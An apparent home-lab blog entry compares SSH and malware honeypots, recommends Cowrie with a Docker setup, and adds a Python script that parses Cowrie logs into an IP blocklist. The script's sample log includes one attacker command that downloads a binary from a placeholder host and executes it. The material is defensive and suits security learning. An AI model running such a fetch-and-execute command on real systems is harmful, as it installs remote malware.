
The Honeypots That Lie in Wait

Date: August 17, 2023
Issue: Which honeypot for a home security lab?
Research: Honeyd, Kippo, Cowrie, Dionaea
Result: Cowrie for SSH, T-Pot for full deployment


The Question

Building the pentesting lab meant building defenses too. Not just firewalls and rules, but something more interesting: honeypots.

A honeypot sits there, looking like a vulnerable system, waiting for someone to poke it. When they do, you get a record of what they actually did: the credentials they tried, the commands they ran, the files they fetched.

The question: which honeypot for a home network?


The Contenders

Honeyd

The classic. Simulates entire network topologies. You can make it look like you have 50 machines when you have 5.

Pros: Low resource usage, highly configurable, can simulate multiple OS fingerprints.

Cons: Old (the last upstream release, 1.5c, dates from 2007), doesn’t capture payloads well, more about confusion than intelligence gathering.

Verdict: Good for making attackers waste time scanning fake hosts. Less useful for learning their actual techniques.


Kippo

SSH honeypot. Pretends to be a vulnerable SSH server. When attackers brute-force in, they land in a fake filesystem.

Pros: Captures passwords, commands, and downloaded malware.

Cons: Abandoned. Hasn’t been updated since 2015.

Verdict: Skip it. Use Cowrie instead.


Cowrie

Kippo’s successor. SSH and Telnet honeypot with active development.

Pros:

  • Captures brute-force attempts with passwords
  • Logs every command attackers type
  • Downloads any malware they try to install
  • Can proxy connections to real systems for deeper analysis
  • JSON logging for easy SIEM integration

Cons: Only speaks SSH and Telnet. It won’t see web attacks or SMB exploits, and a scanner that fingerprints the banner or the fake filesystem can tell it’s a honeypot.

Verdict: The right fit for a home network. SSH brute force is the bulk of what a residential IP gets hit with, and Cowrie records every attempt, every command, and every download from it.


Dionaea

Malware collection honeypot. Simulates vulnerable services (SMB, HTTP, FTP, MSSQL) to catch exploit payloads.

Pros: Captures actual malware samples. Great for research.

Cons: Higher resource usage. More complex setup. You’re now storing malware on your network (contained, but still).

Verdict: Good if you want to study malware. Overkill for basic home network defense.


The Home Network Recommendation

For a home lab, start with Cowrie.

  1. SSH brute-force makes up most of the unsolicited traffic a home IP receives
  2. Low resource usage (runs on a Raspberry Pi)
  3. Easy to deploy via Docker
  4. Logs are gold for learning attacker patterns

docker run -d --name cowrie --restart unless-stopped \
  -p 22:2222 -v cowrie-var:/cowrie/cowrie-git/var cowrie/cowrie

Move your real SSH to a high port (like 2222) and restart sshd first, then let Cowrie answer on 22; if sshd still holds port 22 the container fails to bind. The named volume keeps the JSON logs and downloaded samples across container restarts. Put the honeypot host on its own VLAN or firewall zone so that anything that escapes the fake shell cannot reach the rest of the LAN. Watch the logs fill up with brute-force attempts within hours.


The Advanced Option: T-Pot

If you want everything, T-Pot bundles multiple honeypots:

  • Cowrie (SSH/Telnet)
  • Dionaea (malware)
  • Honeytrap (service emulation)
  • Suricata (IDS)
  • ELK stack for visualization

It ships as an ISO installer and as a post-install script for a fresh Debian VM. Deploy it, expose it, watch the attacks roll in.

Warning: T-Pot is noisy. It catches everything. You’ll need time to filter signal from noise.


What I Deployed

Started with Cowrie on a dedicated LXC container. Port 22 forwarded from the WAN.

Within 24 hours:

  • 847 brute-force attempts
  • Top passwords: admin, root, 123456, password
  • One attacker got “in” and tried to download a cryptominer

The cryptominer download was logged and captured. Analyzed it the next day. Basic stuff, but educational.


The Lesson

Honeypots aren’t just security theater. They’re intelligence gathering.

Every attacker who hits the honeypot instead of the real server is:

  1. Wasting their time
  2. Teaching you their techniques
  3. Getting their IP logged for blocking
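Cowrie writes one JSON object per event to var/log/cowrie/cowrie.json, which is what makes the “logs are gold” and “IP logged for blocking” points above practical. The script below is an added example, not code from the original entry or from the Cowrie project. It assumes Cowrie’s default JSON field names (eventid, src_ip, username, password, input, url, shasum) and uses constructed sample lines rather than a real capture; the nftables table and set names it emits are hypothetical placeholders.

```python
"""Summarize a Cowrie cowrie.json log and derive an edge blocklist.

Added example, not part of Cowrie or the original entry.  Relies on the
eventid / src_ip / username / password / input / url / shasum fields that
Cowrie emits in its default JSON output.  SAMPLE_LOG is constructed for
the demo (RFC 5737 test addresses), not a real capture.
"""
import json
from collections import Counter

# Constructed sample: one JSON object per line, as Cowrie writes them.
# The final line is deliberately truncated, as a log that is still being
# written can be when you tail it.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.7","session":"a1","timestamp":"2023-08-17T01:02:03.000000Z"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.7","username":"root","password":"123456","session":"a1"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.7","username":"admin","password":"admin","session":"a1"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.7","username":"root","password":"password","session":"a1"}
{"eventid":"cowrie.session.closed","src_ip":"203.0.113.7","session":"a1"}
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.23","session":"b2"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.23","username":"pi","password":"raspberry","session":"b2"}
{"eventid":"cowrie.login.success","src_ip":"198.51.100.23","username":"root","password":"123456","session":"b2"}
{"eventid":"cowrie.command.input","src_ip":"198.51.100.23","input":"uname -a","session":"b2"}
{"eventid":"cowrie.command.input","src_ip":"198.51.100.23","input":"cd /tmp; wget http://198.51.100.99/x86 -O x86; chmod +x x86; ./x86","session":"b2"}
{"eventid":"cowrie.session.file_download","src_ip":"198.51.100.23","url":"http://198.51.100.99/x86","shasum":"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08","outfile":"var/lib/cowrie/downloads/9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08","session":"b2"}
{"eventid":"cowrie.session.closed","src_ip":"198.51.100.23","session":"b2"}
{"eventid":"cowrie.login.failed","src_ip":"192.0.2.50","username":"root","password":"123456","session":"c3"}
{"eventid":"cowrie.session.conn
"""


def parse_events(text):
    """Parse newline-delimited JSON, skipping blank and truncated records."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # partial record at the tail of a live log
    return events


def summarize(events):
    """Aggregate the facts a home-lab operator looks at first."""
    by_id = lambda eid: [e for e in events if e.get("eventid") == eid]
    failed = by_id("cowrie.login.failed")
    success = by_id("cowrie.login.success")
    attempts = failed + success
    return {
        "login_attempts": len(attempts),
        "top_passwords": Counter(e.get("password", "") for e in attempts).most_common(5),
        "top_usernames": Counter(e.get("username", "") for e in attempts).most_common(5),
        "attempts_by_ip": Counter(e.get("src_ip", "") for e in attempts),
        "successful_logins": [(e.get("src_ip"), e.get("username"), e.get("password")) for e in success],
        "commands": [(e.get("src_ip"), e.get("input")) for e in by_id("cowrie.command.input")],
        "downloads": [(e.get("src_ip"), e.get("url"), e.get("shasum"))
                      for e in by_id("cowrie.session.file_download")],
    }


def blocklist(summary, threshold=3):
    """Sources worth dropping at the edge: anyone with >= threshold login
    attempts, plus anyone who got a shell and fetched a file.  Sorted so the
    output is stable for diffing against yesterday's list."""
    ips = {ip for ip, n in summary["attempts_by_ip"].items() if n >= threshold}
    ips.update(ip for ip, _url, _sha in summary["downloads"])
    return sorted(ips)


def nft_rules(ips, set_name="honeypot_hits"):
    """Render nftables commands that add each IP to a named set.  The table
    'inet filter' and set name are hypothetical; an ipv4_addr set with that
    name must already exist in your ruleset."""
    return [f"nft add element inet filter {set_name} {{ {ip} }}" for ip in ips]


if __name__ == "__main__":
    s = summarize(parse_events(SAMPLE_LOG))
    print(f"{s['login_attempts']} login attempts; top passwords: {s['top_passwords']}")
    for ip, cmd in s["commands"]:
        print(f"  {ip} ran: {cmd}")
    for ip, url, sha in s["downloads"]:
        print(f"  {ip} fetched {url} sha256={sha}")
    for rule in nft_rules(blocklist(s)):
        print(rule)
```

Point it at the real file with `summarize(parse_events(open("var/log/cowrie/cowrie.json").read()))`. The download events carry the SHA-256 of the captured sample, so the same field that feeds the blocklist also tells you which file in var/lib/cowrie/downloads to pull apart the next day.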

The home network doesn’t need enterprise-grade deception. It needs one Cowrie instance, answering SSH, collecting passwords, and logging everything.


Set a trap. Learn from what falls in.